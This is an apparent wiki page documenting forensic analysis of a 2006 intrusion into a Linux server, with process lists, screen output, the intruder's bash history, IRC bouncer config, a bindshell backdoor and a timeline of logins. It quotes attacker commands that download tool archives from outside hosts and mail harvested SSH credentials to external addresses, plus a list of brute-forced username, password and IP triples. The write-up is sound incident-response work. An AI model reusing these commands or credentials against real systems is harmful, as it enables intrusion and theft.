Forensics on Incident 1
Revision as of 21:36, 24 November 2010 by <bdi>PhilippeTeuwen</bdi> (talk | contribs) (Reverted edits by Etegohy (Talk) to last revision by PhilippeTeuwen)
Breach in ns0 @ e..oss
Analysis
ps auwx: 2006/03/17 +-20:20 ======== test 30731 0.0 0.0 676 284 ? S 00:21 0:00 ./ntpd test 31116 0.0 0.2 2944 1360 ? Ss 00:28 0:00 SCREEN test 31117 0.0 0.2 3000 1228 pts/5 Ss 00:28 0:00 /bin/bash test 31134 0.0 0.2 3164 1368 pts/5 S+ 00:29 0:00 /bin/bash test 32352 0.0 0.0 1444 280 ? Ss 00:43 0:00 ./go test 25680 0.0 0.2 2944 1412 ? Ss 09:03 0:00 SCREEN test 25681 0.0 0.3 3000 1656 pts/6 Ss 09:03 0:00 /bin/bash test 25717 0.0 0.3 3160 1748 pts/6 S+ 09:03 0:00 /bin/bash test 4132 0.0 0.0 1344 204 pts/5 T+ 10:40 0:00 ./go test 4135 0.0 0.0 0 0 pts/5 Z+ 10:40 0:00 [go] <defunct> test 3211 0.0 0.0 1344 240 pts/5 T+ 20:05 0:00 ./go test 3224 0.0 0.0 0 0 pts/5 Z+ 20:05 0:00 [go] <defunct> test 4088 0.0 0.2 2704 1260 pts/6 S+ 20:35 0:00 /bin/bash ./assh 24.35 test 4089 49.4 0.0 1492 456 pts/6 R+ 20:35 4:43 ./pscan2 24.35 22 test 4090 0.0 0.0 0 0 pts/6 Z+ 20:35 0:00 [pscan2] <defunct> test 4097 0.0 0.2 2704 1260 pts/5 S+ 20:35 0:00 /bin/bash ./assh 200.56 test 4098 49.4 0.0 1492 456 pts/5 R+ 20:35 4:43 ./pscan2 200.56 22 test 4099 0.0 0.0 0 0 pts/5 Z+ 20:35 0:00 [pscan2] <defunct> Screens: ======== test@ns0:/root$ screen -ls screen -r test/ There are screens on: 31116.pts-4.ns0 (Detached) 25680.pts-4.ns0 (Detached) 2 Sockets in /var/run/screen/S-test. test@ns0:/root$ screen -r 31116 First screen: ============= Copy of the current page: bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 200.58.255.* (total: 0) (100.0% done) # pscan completed in 820 seconds. (found 0 ips) # Cam putin : 0 de servere ---------------------------------------- # Se apropie sfarsitu :P Fii pe faza Dane.. ping: unknown host www.yahoo.com Toata dragostea mea pentru diavola!!!!!! bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 200.59.112.* (total: 0) (43.9% done) Second screen: ============== Copy of the full screen buffer: test@ns0:/var/tmp/.. /dan$ test@ns0:/var/tmp/.. /dan$ ls 200 assh gen-pass.sh pass_file sshf 200.221.pscan.22 auto go pscan2 ssh-scan 200.59.pscan.22 common go.sh ss vuln.txt bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 24.37.255.* (total: 0) (100.0% done) # pscan completed in 820 seconds. (found 0 ips) # Cam putin : 0 de servere ---------------------------------------- # Se apropie sfarsitu :P Fii pe faza Dane.. ping: unknown host www.yahoo.com Toata dragostea mea pentru diavola!!!!!! bind: Address already in use Norok in continuare ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### # Incep sa scanez IPuri # scanning: 24.38.136.* (total: 0) (53.3% done) test@ns0:/var/tmp/.. /2$ ./auto Enter A class range 24 Enter output file 24 test@ns0:/var/tmp/.. /2$ chmod +x 24 test@ns0:/var/tmp/.. /2$ ./24 ###################################################### # Compiled By D-a-N # #----------------------------------------------------# # Scaner Privat # #----------------------------------------------------# ###################################################### ... Bash history: ============= Ran history in screen 25680.pts-4.ns0: test@ns0:/var/tmp/.. /2$ history 48 first line identical to .bash_history then 49 ./auto 50 chmod +x 24 51 ./24 Content of .bash_history: ls cd ls wget wget rzv69.marte.ro/rzv69.tgz tar zxvf rzv69.tgz ls del 404 wget fire.prohosting.com/claubuc/scaner.jpg tar xzvf scaner.jpg cd scaner ./assh 207.44 ls ./auto 207.44 ./assh 213.186 cd /var/tmp cd .." " screen w passwd w cd /var/tmp ls -a cd /home/test/ ls -a cd scaner ls -a cat vuln.txt cd /var/tmp cat /etc/hosts su vinoj su vinoj su trollingsecours su trollingsecours su trollingsecours cd /var/tmp ls -a mkdir .." " cd .." " wget fire.prohosting.com/scarlatu/dan.jpg wget fire.prohosting.com/scarlatu/psy.jpg tar xzvf psy.jpg cd .bash ./ntpd cd .. tar xzvf dan.jpg cd dan screen ls -a ./go.sh 200.41 ./assh 200.41 exit w screen -r screen -r 30860.pts-2.ns0 screen -r 31116.pts-4.ns0 cd /var/tmp cd .." " cd dan pico vuln.txt rm -rf vuln.txt touch vuln.txt cd .. tar xzvf dan.jpg ls -a cd dan ls -a cd .. mv dan 1 tar xzvf dan.jpg mv dan 2 mv 1 dan ls -a cd 2 screen screen -r screen -r 30860.pts-2.ns0 screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 cd /var/tmp cd .." " cd 2 pico vuln.txt cd .. cd dan pico vuln.txt cat vuln.txt clear w screen -r screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 w ls -a cd /var/tmp cd .." " cd dan vi vuln.txt cd /var/tmp cd .." " cd dan vi vuln.txt ls -a cd .. cd 2 vi vuln.txt ls -a w screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 cd /var/tmp cd .." " cd .." " cd dan vi vuln.txt ls -a cd .. cd 2 vi vuln.txt ls -a screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 ftp screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 25680.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 ftp screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 w screen -r screen -r 31116.pts-4.ns0 screen -r 25680.pts-4.ns0 crontab -e Tools: ====== * Attempt to download rzv69.marte.ro/rzv69.tgz, err 404 * Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz) * Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz) * Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz) * Romanian scripts * Compiled By D-a-N * cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools) * cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools) Scans: ====== * scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186 Netstat Abstract: (within the 800 simultaneous scans) tcp 0 1 213.186.53.59:59930 24.35.236.71:22 SYN_SENT 4089/pscan2 tcp 0 1 213.186.53.59:60352 200.56.236.93:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60288 200.56.236.29:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60424 200.56.236.165:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60233 200.56.235.229:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60169 200.56.235.165:22 SYN_SENT 4098/pscan2 tcp 0 1 213.186.53.59:60095 200.56.235.91:22 SYN_SENT 4098/pscan2 IRC: ==== * Connection to IRC(6667) with psyBNC(ntpd) to 195.204.1.130 ** = oslo1.no.eu.undernet.org Netstat: tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 30731/ntpd tcp 0 0 213.186.53.59:34227 195.204.1.130:6667 ESTABLISHED30731/ntpd Diffs between the downloaded tool and the hacker's version: --- log/psybnc.log 1970-01-01 01:00:00.000000000 +0100 +++ log/psybnc.log 2006-03-19 23:32:53.000000000 +0100 @@ -0,0 +1,15 @@ +Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667 +Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731) +Fri Mar 17 00:21:14 :Loading all Users.. +Fri Mar 17 00:21:14 :No Users found. +Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net +Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan) +Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net +Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de dan +Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat +Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 (). +Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 () +Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined) +Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 (). +Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 () +Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net) --- motd/USER1.MOTD 1970-01-01 01:00:00.000000000 +0100 +++ motd/USER1.MOTD 2006-03-19 23:32:53.000000000 +0100 @@ -0,0 +1,71 @@ +:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL +:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07 +:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST +:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov +:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server +:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server +:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers +:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online +:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s) +:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed +:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers +:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day - +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Welome to Oslo*.NO.EU.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Disclaimer / Rules +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Irc is an umoderated international medium. Cloning is +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- strictly forbidden on this server, any clones will +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not be tolerated. Mass Messaging / Mass Invites are not +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- allowed on any Undernet server, any offenders will be killed. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Using this server means you agree to all of its rules and the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- rules of Undernet. If you cannot agree to this then /quit now. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Server contact info: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- E-mail : oslo@undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> News: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.05.2005] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are out of news. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.12.2004] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We shut down the channel #banetele. Most of the users in there needed +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- reop/channel related helping and we have #nastrand for that. For info +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not related to channel/user problems, email oslo@undernet.org. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [26.08.2003] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are back online :) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Thank you to our provider www.banetele.com for all help! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Ports: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 6666, 6667, 6668, 7000 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Bot Policies: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- It is allowed to run NON abusive bots on this server, all abusive +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- bots will be killed on sight. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Undernet has Cservice. Go to http://cservice.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- or #Cservice if you have any questions. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Help Channels: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #nastrand -> Oper/IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #cservice -> Cservice questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #mIRC -> For mIRC questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #vh -> For help with viruses +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #helpchan -> IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Please notice that these channels are not administrated by the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- oslo.* crew and we and/or the server sponsors can not be held +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- responsible for actions taken or info given in the channels. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> AGAIN .. READ THIS !! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- The use of this server is no right, but a privilege. The admin(s) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- and opers can revoke this priviledge without further notice and +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- without a reason. +:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command. --- psybnc.conf 2003-04-07 14:47:00.000000000 +0200 +++ psybnc.conf 2006-03-19 23:32:53.000000000 +0100 @@ -1,3 +1,25 @@ PSYBNC.SYSTEM.PORT1=6667 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* +USER1.USER.LOGIN=dan +USER1.USER.USER=x +USER1.USER.PASS==0x'q'0'W`2'S0I'F`x +USER1.USER.RIGHTS=1 +USER1.USER.VLINK=0 +USER1.USER.PPORT=0 +USER1.USER.PARENT=0 +USER1.USER.QUITTED=0 +USER1.USER.DCCENABLED=1 +USER1.USER.AUTOGETDCC=0 +USER1.USER.AIDLE=0 +USER1.USER.LEAVEQUIT=0 +USER1.USER.AUTOREJOIN=1 +USER1.USER.SYSMSG=1 +USER1.USER.LASTLOG=0 +USER1.USER.NICK=D-a-N +USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org +USER1.SERVERS.PORT2=6667 +USER1.SERVERS.SERVER2=195.204.1.130 +USER1.SERVERS.PORT1=6667 +USER1.CHANNELS.ENTRY1=#porumbei +USER1.CHANNELS.ENTRY0=#xibit Backdoor: ========= * ./go opens port 19876 with a shell without auth cf http://www.2701.org/archive/200311240000.html Netstat: tcp 0 0 0.0.0.0:19876 0.0.0.0:* LISTEN 32352/go * ./ss cf http://www.securiteam.com/tools/5EP0B0ADFO.html Fast SYN Scanner (libnet, libpcap) 11 Jul. 2004 Credit: The information has been provided by Doctor BIOS. The following tool is a fast SYN scanner written in C. vuln.txt: ========= cf http://www.lockeddown.net/rst-expl.txt ssh brute-force: ================ ssh-scan and sshf ./sshf <procese adika cate de alea deodata incerc> ~= how many processes to run together /etc/passwd: ============ test:x:1024:1024:,,,:/home/test:/bin/false mails: ====== cat /etc/passwd /sbin/ifconfig |grep inet cat /etc/hosts uname -a w ping -c 3 www.yahoo.com cat vuln.txt chmod +x go ./go 139P Received: from test by ns0.exxoss.com with local (Exim 4.50) for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100 023T To: usdpower@yahoo.com 023 Subject: linux-printer 047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com> 034F From: ",,," <test@ns0.exxoss.com> 038 Date: Fri, 17 Mar 2006 17:35:14 +0100 To-be-Mailed data: administrator:administrator:24.16.169.218 guest:guest:24.16.169.218 test:test:24.3.178.253 mysql:mysql:200.27.145.74 root:admin1:200.31.199.77 root:password:24.8.131.152 root:secure:24.11.225.20 root:123456:200.32.86.228 root:1234567890:200.32.86.228 root:admin1:200.32.86.228 root:admin:200.32.86.228 root:administrator1:200.32.86.228 root:backup:200.32.86.228 root:passwd:200.32.86.228 root:password123:200.32.86.228 root:password:200.32.86.228 root:qwerty:200.32.86.228 root:root1:200.32.86.228 root:root:200.32.86.228 root:rootroot:200.32.86.228 root:secret:200.32.86.228 root:secure:200.32.86.228 root:administrator:200.32.86.228 (honeypot probably) RST virus: ========== Quick and dirty way to find infected files: find . -type f -exec strings --all {} \; |grep snortdos Files: "Dumb" scan of all files Switches: -ARCHIVE -PACKED -SERVER /tmp/scaner/go Infection: Unix/RST.B /tmp/scaner/pscan2 Infection: Unix/RST.B /tmp/scaner/ss Infection: Unix/RST.B /tmp/scaner/ssh-scan Infection: Unix/RST.B /tmp/scaner/sshf Infection: Unix/RST.B Results of virus scanning: Infected: 5 Seems that infected files are updating them at each run and modify the timestamp /home/test/scaner: 23714 2006-03-06 23:23 go 25503 2005-05-06 19:00 pscan2 458068 2006-03-07 00:03 ss 846520 2006-03-07 00:03 sshf 846832 2006-03-06 23:12 ssh-scan /var/tmp/.. /2: 23714 2006-03-17 21:17 go 25503 2006-03-17 21:17 pscan2 458068 2006-03-17 21:17 ss 846520 2006-03-17 21:17 sshf 846832 2006-03-17 21:17 ssh-scan /var/tmp/.. /dan: 23714 2006-03-17 10:35 go 25503 2006-03-17 21:17 pscan2 458068 2006-03-17 21:17 ss 846520 2006-03-17 21:17 sshf 846832 2006-03-17 21:17 ssh-scan 21:17 corresponds to the crash of the server so probably infected executables are left open even after being killed Note: same virus present also in: /ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND /ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND TIMELINE: ========= 2006/02/16 08:58:08 82.79.137.30 vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client "82.79.137.30" Mar 6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be Mar 6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2 Mar 6 12:29:31 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash Mar 06 06 12:30:50 4096 m.c drwxr-xr-x root root /etc/webmin 639 m.c -rw------- root root /etc/webmin/miniserv.conf Mar 6 12:31:05 localhost webmin[31297]: Webmin starting Mar 6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be 2006/03/06 13:48:47 82.79.137.24 * vsftpd: Mon Mar 6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client "82.79.137.24" Mar 03 06 15:53:30 21 m.c -rw-r----- root shadow /etc/webmin/miniserv.users Mar 03 06 16:11:31 4096 m.c drwxr-xr-x root root /etc/exim4 7838 m.c -rw-r--r-- root root /etc/exim4/exim4.conf Mar 6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2 Mar 6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2 Mar 6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash Mar 6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2 dorian12 pts/2 217.117.45.148 Mon Mar 6 21:38 - 21:40 (00:01) Mar 6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2 Mar 6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash 2006/03/06 22:27:30 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-" 2006/03/06 22:27:31 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-" 2006/03/06 22:28:16 82.79.137.27 Mar 6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27 2006/03/06 22:28:18 82.79.137.27 vsftpd: Mon Mar 6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client "82.79.137.27" 2006/03/06 22:28:18 82.79.137.18 Mar 6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18 2006/03/06 22:28:20 82.79.137.18 vsftpd: Mon Mar 6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client "82.79.137.18" 2006/03/06 22:28:29 82.79.137.25 * vsftpd: Mon Mar 6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client "82.79.137.25" 2006/03/06 22:28:30 82.79.137.14 * vsftpd: Mon Mar 6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client "82.79.137.14" 2006/03/06 22:28:39 82.79.137.22 Mar 6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro user=test 2006/03/06 22:28:41 82.79.137.22 Mar 6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro 2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2 2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0) 2006/03/06 22:28 82.79.137.22 * test pts/2 82.79.137.22 Mon Mar 6 22:28 - 00:21 (01:52) 2006/03/06 22:31:06 82.79.137.18 Mar 6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18 2006/03/06 23:29:14 82.79.137.7 * vsftpd: Mon Mar 6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client "82.79.137.7" 2006/03/06 22:40:54 82.79.137.22 *! Mar 06 06 22:40:54 167818 m.. -rw-r--r-- test test /home/test/scaner/207.44.pscan.22 2006/03/06 23:12:35 82.79.137.22 *! Mar 06 06 23:12:35 846832 m.. -rwxr-xr-x test test /home/test/scaner/ssh-scan 2006/03/06 23:23:56 82.79.137.22 *! Mar 06 06 23:23:56 23714 m.. -rwxr-xr-x test test /home/test/scaner/go 2006/03/06 00:03:34 82.79.137.22 *! Mar 07 06 00:03:34 846520 m.. -rwxr-xr-x test test /home/test/scaner/sshf 2006/03/06 00:03:34 82.79.137.22 *! 4096 m.. drwxr-xr-x test test /home/test/scaner 2006/03/06 00:03:34 82.79.137.22 *! 458068 m.. -rwxr-xr-x test test /home/test/scaner/ss skycode pts/3 213.186.53.55 Tue Mar 7 00:14 - down (00:45) 2006/03/07 00:21:24 82.79.137.22 * Mar 7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test skycode pts/2 213.186.53.55 Tue Mar 7 00:58 - down (00:01) runlevel (to lvl 6) Tue Mar 7 00:59 - 00:59 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 00:59 - 01:02 (00:02) 2.4.27-2-386 reboot system boot Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386 skycode pts/0 Tue Mar 7 01:04 - 01:04 (00:00) 213.186.53.55 skycode pts/0 Tue Mar 7 08:28 - down (00:16) 213.186.53.55 runlevel (to lvl 6) Tue Mar 7 08:45 - 08:45 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 08:45 - 08:48 (00:02) 2.4.27-2-386 reboot system boot Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386 skycode pts/0 Tue Mar 7 08:56 - down (00:22) 213.186.53.55 skycode pts/1 Tue Mar 7 09:17 - down (00:01) 213.186.53.55 runlevel (to lvl 6) Tue Mar 7 09:18 - 09:18 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 09:18 - 09:22 (00:03) 2.4.27-2-386 reboot system boot Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386 skycode pts/0 Tue Mar 7 09:23 - down (00:01) 217.136.140.81 runlevel (to lvl 6) Tue Mar 7 09:25 - 09:25 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 09:25 - 09:28 (00:02) 2.4.27-2-386 reboot system boot Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386 skycode pts/0 Tue Mar 7 09:34 - down (00:09) 217.136.140.81 runlevel (to lvl 6) Tue Mar 7 09:44 - 09:44 (00:00) 2.4.27-2-386 shutdown system down Tue Mar 7 09:44 - 09:48 (00:04) 2.4.27-2-386 reboot system boot Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386 runlevel (to lvl 2) Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386 2006/03/09 14:57:31 82.79.137.27 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client "82.79.137.27" 2006/03/09 14:57:31 82.79.137.26 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client "82.79.137.26" 2006/03/09 14:57:31 82.79.137.28 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client "82.79.137.28" 2006/03/09 14:57:31 82.79.137.7 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client "82.79.137.7" 2006/03/09 14:57:33 82.79.137.28 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client "82.79.137.28" 2006/03/09 14:57:33 82.79.137.30 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client "82.79.137.30" 2006/03/09 15:01:29 82.79.137.30 30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:01:30 82.79.137.30 30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-" 2006/03/09 15:01:34 82.79.137.6 Mar 9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6 2006/03/09 15:01:36 82.79.137.6 vsftpd: Thu Mar 9 15:01:36 2006 